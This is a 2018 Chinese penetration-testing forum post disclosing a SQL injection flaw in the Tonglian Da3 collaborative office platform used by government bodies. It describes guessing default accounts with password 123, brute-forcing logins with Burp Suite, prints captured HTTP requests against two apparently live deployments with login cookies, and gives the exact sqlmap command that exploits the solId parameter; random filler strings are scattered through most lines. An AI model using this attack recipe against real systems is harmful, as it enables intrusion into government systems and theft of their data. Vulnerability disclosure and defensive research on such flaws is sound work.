中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin    时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

6 D9 B$ W3 B8 [
6 [6 `6 x7 d- Y' j- M- F9 x+ J

+ |" Y I, ]" \3 ~8 I

+ I* y1 ^1 @; ~ 平台简介: / W6 w$ z; b8 r2 G ?

% v* x# q J* T. _0 @1 \) a b

4 p8 R' U% E B) o. |8 e' v  ' S4 u& [ t3 T& m/ U

# B7 T) [7 \+ k( X. U. L

L- I+ I u- p# J5 d# E. E 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
6 d& L& H( U1 m; S/ M0 r) v4 V同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
' R' H' I. h7 ?7 |同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! 2 @" ^7 _4 S7 A7 U n

1 v1 i! N+ x- Z2 |) M, e' z

?: G1 G9 t3 x; S, P3 L  9 f- c8 z7 s- b/ W8 R

' z/ [* S7 W4 m

/ E2 I) F! m( D9 }8 b2 n% u; ] 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:7 _+ T: v' ?2 C, S

' M6 A) F/ K" r, [/ \! p

& w, V4 `3 B' j+ O( ?, G4 ~: e  , Q z) N2 t9 `: m

5 N0 B) }7 {8 _1 Z

+ w, _1 s( A) m" {% F http://1.1.1.1:7197/cap-aco/#(案例2-)) m8 S+ |& Q" Q

/ O5 N: `9 i! X: C2 u, N6 w

. U7 a' A% ^ Q http://www.XXOO.com (案例1-官网网站): f- r" E; {/ g; v* D8 \

3 t5 r) V. i5 v

" Y/ g6 X7 I, I% G   1 y. Q% r& R. L

) _6 s& w: c" d) x$ P: n5 n5 `1 V

2 V' e& R" s/ Y( o 漏洞详情: : ]# ]. p" N! ?% @0 u4 H

+ T8 o0 C( o8 P

) X/ j `( F2 b {/ r  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 : k1 B0 |' d# g/ U

7 d* [, p: h6 D* F& h- e; _

1 S! ?1 @! Y$ Q8 R7 x) C% U      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: $ ~! n6 T7 I0 a: f$ u/ a

+ L; {$ \) J9 A7 v- ?6 H: M4 P

! h: ^5 d' q. c, i  : }8 A+ R4 e4 O) e/ R$ Q4 Z

5 [& H) M9 g0 e3 ]! E" r

% Z' D5 s4 y$ S; `5 ]   0 O% ?/ A, l9 g) I, l

" x; n( z# |( Z* a$ w$ C: ^

( W! B) d [% Q/ w" X status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:2 C- d0 v' T/ Z- f6 R9 K

$ O+ b) X$ z( g! \* a

8 _; g6 m J5 o" r4 R 1、案例1-官方网站 5 t4 ^& ^8 X, @( p

" ^8 _. I0 g' U i+ ]3 k& O/ X% }, x

; ^9 p. o4 t& H9 Y6 D GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 5 E" c' F6 O) k8 ~* P

8 y8 q& H' G) ` P0 P/ q

4 s4 D; U$ o" f4 d9 s- X Host: www.XXOO.com ! W3 f) {5 n- g

9 r9 K3 d2 Z; C6 q- P

! `0 G9 |( v' k" D7 b( V Proxy-Connection: Keep-Alive # k3 _4 F# M: w" M- {. U

y7 m8 X/ @3 k- J+ D% O3 z

( l) r& ~# u0 U Accept: application/json, text/javascript, */*; q=0.01: v0 j2 j3 D6 G* ~

7 L: Y6 Y' M _3 K2 | g# }

X, y7 F. O2 [( X Accept-Language: zh-CN+ E, i) V+ D1 q3 l) s6 X- W

; b- W! b; q+ p% F0 u! [

3 L# |- w/ C, a, \4 ]8 ` Content-Type: application/json: t! g- X" B% v! b! C: C

( o; Q+ o) j, p* p7 T

3 ]. I/ Y6 o% }! g7 D5 p User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko' D( w# k! K! d# C+ H" `) }

7 H! H. W/ j, M6 A) X) K2 M S

& u7 f i4 t0 g- q% A# p X-Requested-With: XMLHttpRequest8 q$ U) R# `1 H, }$ i2 m g! w

' ^$ M1 l. ]# k1 |6 B

- t' m0 u+ R, e Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 ' U( g+ M. k( d! H$ Z7 \+ |

5 ^1 P0 i. U0 U+ X) Q0 d

7 [6 o5 e& }( m1 a Accept-Encoding: gzip, deflate, sdch ; E0 R) k) @+ h) v% W

5 h5 |% D) h+ O

: S) w T9 @2 X3 M, C' m0 v- I. n Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e 0 h, O, D# g# b; B1 N; @2 V9 q

, x( u/ g- d( L1 d

) S; L" `8 U( }% N; q 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:# i& Z* m5 R: ?- ]) O

& V% [$ u$ q0 k/ u

3 g8 v: \/ r2 N; M' g* H  $ g& _/ T) n" s' R

: {: L& p3 C! {4 a

. w& k. S2 N& i   Y% t U% A& ?2 x. |9 C

( M0 u$ c6 d" }2 u! Y- h% R* n& C

) O2 H$ i% t$ K' g   ) h1 e' S5 ?. w( U3 E

. F9 X# @3 D& h! P2 @. Q" i3 D

8 u6 ^; o1 K- y* B' W9 [1 I   7 T3 ]# N, v: _7 Y' @

# u$ m. i( @+ g% r5 `: ?, D! G1 R

3 k" L1 z* z9 _. r% ]( x  * P! j( k$ i7 g0 @+ s% M

z% S- E+ o, s0 ]

: ~2 d) f1 D9 P! ? 2、案例2-某天河云平台+ i! \ @: d' M0 U% p; b6 Z

7 \2 f+ R' v) O! A$ F

4 }- ^) q/ i3 [' I" R GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 - N7 `1 q8 z( T5 x) J& P) L3 J

; c+ n& O4 w# T$ q, ~: {, W

/ `/ E1 U( s$ q4 O0 { Host: 1.1.1.:7197 % W: {$ [& i% s1 a# f' c

3 ^6 f5 p/ Q% X7 S: `1 U; ^

5 l* y7 G. Y* I: q. g Accept: application/json, text/javascript, */*; q=0.01 + D$ j0 O( N8 K% I

p+ a$ B9 o5 H* i5 U5 O% u

) W% p2 X1 t2 U( c1 q5 S9 \ X-Requested-With: XMLHttpRequest+ i! X* o+ S" `* B

8 _1 H4 t* q/ d/ p' ^6 K0 N6 g

+ d: ` O" X- R* D! f User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0: l5 \# x$ l' Z* R

3 @( {7 F2 A% J) c9 F$ d/ _# Q; G

- M" v7 F9 g, N+ a6 j Content-Type: application/json3 W2 r8 }0 m) k) s( _

8 |, j. I* r& S' f; j

+ G2 Z {: \! I; n Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008% G7 W% w7 Q- q5 s

1 m; Z: A- R5 u5 _4 w8 B$ w

3 H3 y! v1 Y. A8 |! \0 P! l2 x Accept-Language: zh-CN,zh;q=0.8 8 P2 R& c' M1 O: K! M) d! x; d

2 k5 e7 V4 I& x% b; \+ S" `

* T7 x& k2 s$ b* M% v Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 0 X. [% b4 _* |9 [0 x+ U

: j+ Z0 q/ f; `6 r

7 o" Y5 e' J: G; ~$ X Connection: close, |. I$ j1 ?0 o+ s8 z

! n4 S; {! n; [7 b

8 o; D6 ^5 E& t; S8 ` _ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:: D4 K: B* |* v

0 X k% E, s7 D. T% P

' M: u3 ~4 _0 t' X; ^* a   / U; i, c Z0 E) j z! I: P" F% L

0 L1 c& ~! S% Q

( t, ]* s# }1 ]) T8 Q
1 A4 G3 b& q ?9 D1 a( b: n2 X






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2